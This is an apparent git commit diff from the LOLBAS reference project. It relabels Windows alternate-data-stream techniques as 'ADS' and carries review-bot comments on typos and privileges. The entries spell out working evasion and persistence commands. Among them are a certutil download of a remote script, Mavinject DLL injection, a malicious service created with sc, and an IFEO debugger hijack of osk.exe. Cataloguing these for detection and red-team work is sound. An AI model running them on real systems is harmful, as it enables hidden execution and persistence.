mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-12-25 14:29:24 +01:00
Changed alternate data stream to ADS as category
This commit is contained in:
parent
7961a99173
commit
d48273583e
@ -3,7 +3,10 @@
#Author: Oddvar Moe
#If you can use it, be my guest!

$mainpath = "C:\data\gitprojects\LOLBAS"
# Install-Module powershell-yaml
# import-module powershell-yaml

$mainpath = "C:\LOLBAS"


function Convert-YamlToMD
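Review bot: `$mainpath = "C:\LOLBAS"` is still a hard-coded absolute path, and the new `# Install-Module powershell-yaml` / `# import-module powershell-yaml` lines are commented out, so the script keeps an implicit dependency on the powershell-yaml module and only fails once Convert-YamlToMD is actually called. Suggest a `param([string]$mainpath = "C:\LOLBAS")` block so other contributors don't have to edit the file, and either an uncommented `Import-Module powershell-yaml` or a `#Requires -Modules powershell-yaml` line at the top so the missing-module case fails early with a clear message.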
@ -7,7 +7,7 @@ Commands:
- Command: bitsadmin /create 1 bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL bitsadmin /RESUME 1 bitsadmin /complete 1
Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command from an Alternate data stream, then resume and complete the job.
Usecase: Performs execution of specified file in the alternate data stream, can be used as a defensive evasion or persistence technique.
Category: Alternate data streams
Category: ADS
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
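Review bot: the Command in this hunk runs five bitsadmin invocations on one line with no separator between them (`bitsadmin /create 1 bitsadmin /addfile 1 ...`), so the rendered entry is not something a reader can copy as-is; if the YAML really stores it this way, separate the calls with `&` or put them on their own lines. The category rename itself is fine, but the Description still spells out "Alternate data stream" while the new `Category: ADS` abbreviates; pick one form for the prose of all entries in this commit. The MitreLink uses the older `/wiki/Technique/T1096` path form; confirm it still resolves wherever the generator links it.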
@ -15,7 +15,7 @@ Commands:
- Command: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
Description: Download and save a PS1 file to an Alternate Data Stream (ADS).
Usecase: Download file from Internet and save it in an NTFS Alternate Data Stream
Category: Alternate data streams
Category: ADS
Privileges: User
MitreID: T1105
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
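Review bot: the Command downloads from a third-party personal GitHub repository (`raw.githubusercontent.com/Moriarty2016/...`) that the project does not control, so the reference entry can silently change or disappear; an obviously fictitious placeholder URL is the safer choice for documentation. Also, the destination `c:\temp:ttt` attaches the stream to `c:\temp` itself, which differs from the other entries in this commit (they attach to a named file such as `file.txt`); worth stating in the Description.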
@ -7,7 +7,7 @@ Commands:
- Command: control.exe c:\windows\tasks\file.txt:evil.dll
Description: Execute evil.dll which is stored in an Alternate Data Stream (ADS).
Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
Category: Alternate data streams
Category: ADS
Privileges: User
MitreID: T1196
MitreLink: https://attack.mitre.org/wiki/Technique/T1196
@ -7,7 +7,7 @@ Commands:
- Command: cscript c:\ads\file.txt:script.vbs
Description: Use cscript.exe to exectute a Visual Basic script stored in an Alternate Data Stream (ADS).
Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
Category: Alternate data streams
Category: ADS
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
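Review bot: typo in the Description line of this hunk: "exectute" should be "execute"; since the commit already touches this entry, fix it here.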
@ -15,7 +15,7 @@ Commands:
- Command: esentutl.exe /y C:\ADS\file.exe /d c:\ADS\file.txt:file.exe /o
Description: Copies the source EXE to an Alternate Data Stream (ADS) of the destination file.
Usecase: Copy file and hide it in an alternate data stream as a defensive counter measure
Category: Alternate data streams
Category: ADS
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
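Review bot: the Usecase wording "hide it in an alternate data stream as a defensive counter measure" reads as if hiding the file were the countermeasure; the intent, matching the other entries in this commit, is evasion, e.g. "to evade defensive countermeasures". The same phrase appears in the third esentutl hunk (the `\\192.168.100.100\webdav` one) and should be fixed there as well.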
@ -23,7 +23,7 @@ Commands:
- Command: esentutl.exe /y C:\ADS\file.txt:file.exe /d c:\ADS\file.exe /o
Description: Copies the source Alternate Data Stream (ADS) to the destination EXE.
Usecase: Extract hidden file within alternate data streams
Category: Alternate data streams
Category: ADS
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
@ -31,7 +31,7 @@ Commands:
- Command: esentutl.exe /y \\192.168.100.100\webdav\file.exe /d c:\ADS\file.txt:file.exe /o
Description: Copies the remote source EXE to the destination Alternate Data Stream (ADS) of the destination file.
Usecase: Copy file and hide it in an alternate data stream as a defensive counter measure
Category: Alternate data streams
Category: ADS
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
@ -23,7 +23,7 @@ Commands:
- Command: expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat
Description: Copies source file to destination Alternate Data Stream (ADS)
Usecase: Copies files from A to B
Category: Alternate data streams
Category: ADS
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
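Review bot: the Usecase "Copies files from A to B" says nothing about the ADS destination that is the whole reason this entry sits in this category; phrase it like the other copy entries in this commit (for example "Copy a file into an alternate data stream to hide it from defensive countermeasures").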
@ -7,7 +7,7 @@ Commands:
- Command: extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
Description: Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file.
Usecase: Extract data from cab file and hide it in an alternate data stream.
Category: Alternate data streams
Category: ADS
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
@ -15,7 +15,7 @@ Commands:
- Command: extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe
Description: Extracts the source CAB file on an unc path into an Alternate Data Stream (ADS) of the target file.
Usecase: Extract data from cab file and hide it in an alternate data stream.
Category: Alternate data streams
Category: ADS
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
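Review bot: style point in the Description of this hunk: "unc path" should be "UNC path".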
@ -7,7 +7,7 @@ Commands:
- Command: findstr /V /L W3AllLov3DonaldTrump c:\ADS\file.exe > c:\ADS\file.txt:file.exe
Description: Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.
Usecase: Add a file to an alternate data stream to hide from defensive counter measures
Category: Alternate data streams
Category: ADS
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
@ -15,7 +15,7 @@ Commands:
- Command: findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.txt:file.exe
Description: Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.
Usecase: Add a file to an alternate data stream from a webdav server to hide from defensive counter measures
Category: Alternate data streams
Category: ADS
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
@ -15,7 +15,7 @@ Commands:
- Command: forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe"
Description: Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\windows\system32 folder.
Usecase: Use forfiles to start a new process from a binary hidden in an alternate data stream
Category: Alternate data streams
Category: ADS
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
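Review bot: typo in the Description of this hunk: "Alternate Data Stream (AD)" should be "(ADS)", which is also the abbreviation this commit standardizes on for the Category field.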
@ -7,7 +7,7 @@ Commands:
- Command: makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.
Usecase: Hide data compressed into an alternate data stream
Category: Alternate data streams
Category: ADS
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
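Review bot: the Description is ambiguous about which file carries the stream: "Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file" uses "target" for both sides, while in the Command the source is `autoruns.exe` and the stream is created on `cabtest.txt`. Say "of the destination file" (or name `cabtest.txt`) for the second occurrence.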
@ -15,7 +15,7 @@ Commands:
- Command: Mavinject.exe 4172 /INJECTRUNNING "c:\ads\file.txt:file.dll"
Description: Inject file.dll stored as an Alternate Data Stream (ADS) into a process with PID 4172
Usecase: Inject dll file into running process
Category: Alternate data streams
Category: ADS
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
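Review bot: MitreID T1096 only covers the ADS storage side of this entry; the behaviour the Command actually demonstrates is DLL injection into a running process (PID 4172), which ATT&CK tracks as T1055 Process Injection. Other entries in this commit already map to their execution technique rather than to T1096 (mshta to T1170, control.exe to T1196), so decide on one rule for the ADS category and apply it here as well.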
@ -31,7 +31,7 @@ Commands:
- Command: mshta.exe "C:\ads\file.txt:file.hta"
Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.
Usecase: Execute code hidden in alternate data stream
Category: Alternate data streams
Category: ADS
Privileges: User
MitreID: T1170
MitreLink: https://attack.mitre.org/wiki/Technique/T1170
@ -7,7 +7,7 @@ Commands:
- Command: print /D:C:\ADS\File.txt:file.exe C:\ADS\File.exe
Description: Copy file.exe into the Alternate Data Stream (ADS) of file.txt.
Usecase: Hide binary file in alternate data stream to potentially bypass defensive counter measures
Category: Alternate data streams
Category: ADS
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
@ -7,7 +7,7 @@ Commands:
- Command: reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg
Description: Export the target Registry key and save it to the specified .REG file within an Alternate data stream.
Usecase: Hide/plant registry information in Alternate data stream for later use
Category: Alternate data streams
Category: ADS
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
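Review bot: consistency point: the Description and Usecase in this hunk write "Alternate data stream" in lowercase without the abbreviation, while neighbouring entries use "Alternate Data Stream (ADS)"; since the purpose of the commit is to standardize on ADS, align the prose here too.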
@ -7,7 +7,7 @@ Commands:
- Command: regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
Description: Export the target Registry key to the specified .REG file.
Usecase: Hide registry data in alternate data stream
Category: Alternate data streams
Category: ADS
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
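Review bot: the Description ("Export the target Registry key to the specified .REG file") omits that the destination `c:\ads\file.txt:regfile.reg` is an alternate data stream, which is the reason the entry is in this category; the reg export entry in this commit says so explicitly, so match its wording.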
@ -15,7 +15,7 @@ Commands:
- Command: regedit C:\ads\file.txt:regfile.reg"
Description: Import the target .REG file into the Registry.
Usecase: Import hidden registry data from alternate data stream
Category: Alternate data streams
Category: ADS
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
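Review bot: the Command in this hunk has an unbalanced trailing quote: `regedit C:\ads\file.txt:regfile.reg"`. Either drop the stray `"` or quote the whole path.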
@ -7,7 +7,7 @@ Commands:
- Command: sc create evilservice binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto\ & sc start evilservice
Description: Creates a new service and executes the file stored in the ADS.
Usecase: Execute binary file hidden inside an alternate data stream
Category: Alternate data streams
Category: ADS
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
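Review bot: `Privileges: User` is wrong for this entry: `sc create` and `sc start` need an administrator context, since a standard user cannot register a service, so the field should read `Privileges: Administrator`. The Command line also has a stray backslash in `start= auto\ &` and mixes `c:\\ADS\\file.txt` (doubled backslashes) with `c:\ADS\works.txt` (single) inside the same binPath string; pick one escaping style so the line copies cleanly.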
@ -7,7 +7,7 @@ Commands:
- Command: wmic.exe process call create "c:\ads\file.txt:program.exe"
Description: Execute a .EXE file stored as an Alternate Data Stream (ADS)
Usecase: Execute binary file hidden in Alternate data streams to evade defensive counter measures
Category: Alternate data streams
Category: ADS
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
@ -20,7 +20,7 @@ Commands:
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: 'wmic.exe /user: /password: /node: process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"'
- Command: wmic.exe process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"
Description: Add cmd.exe as a debugger for the osk.exe process. Each time osk.exe is run, cmd.exe will be run as well.
Usecase: Execute binary by manipulate the debugger for a program to evade defensive counter measures
Category: Execute
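Review bot: this hunk is unrelated to the category rename named in the commit message: it replaces the quoted Command variant with empty `/user: /password: /node:` switches by the plain `wmic.exe process call create` form. Dropping the empty switches is reasonable, but the change belongs in its own commit or at least in the message. Two smaller points: the `reg.exe add` writes under `HKLM\...\Image File Execution Options`, which needs an elevated context, so check that this entry's Privileges field (outside the hunk) is not "User"; and the Usecase grammar "by manipulate the debugger" should be "by manipulating the debugger".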
@ -7,7 +7,7 @@ Commands:
- Command: wscript c:\ads\file.txt:script.vbs
Description: Execute script stored in an alternate data stream
Usecase: Execute hidden code to evade defensive counter measures
Category: Alternate data streams
Category: ADS
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096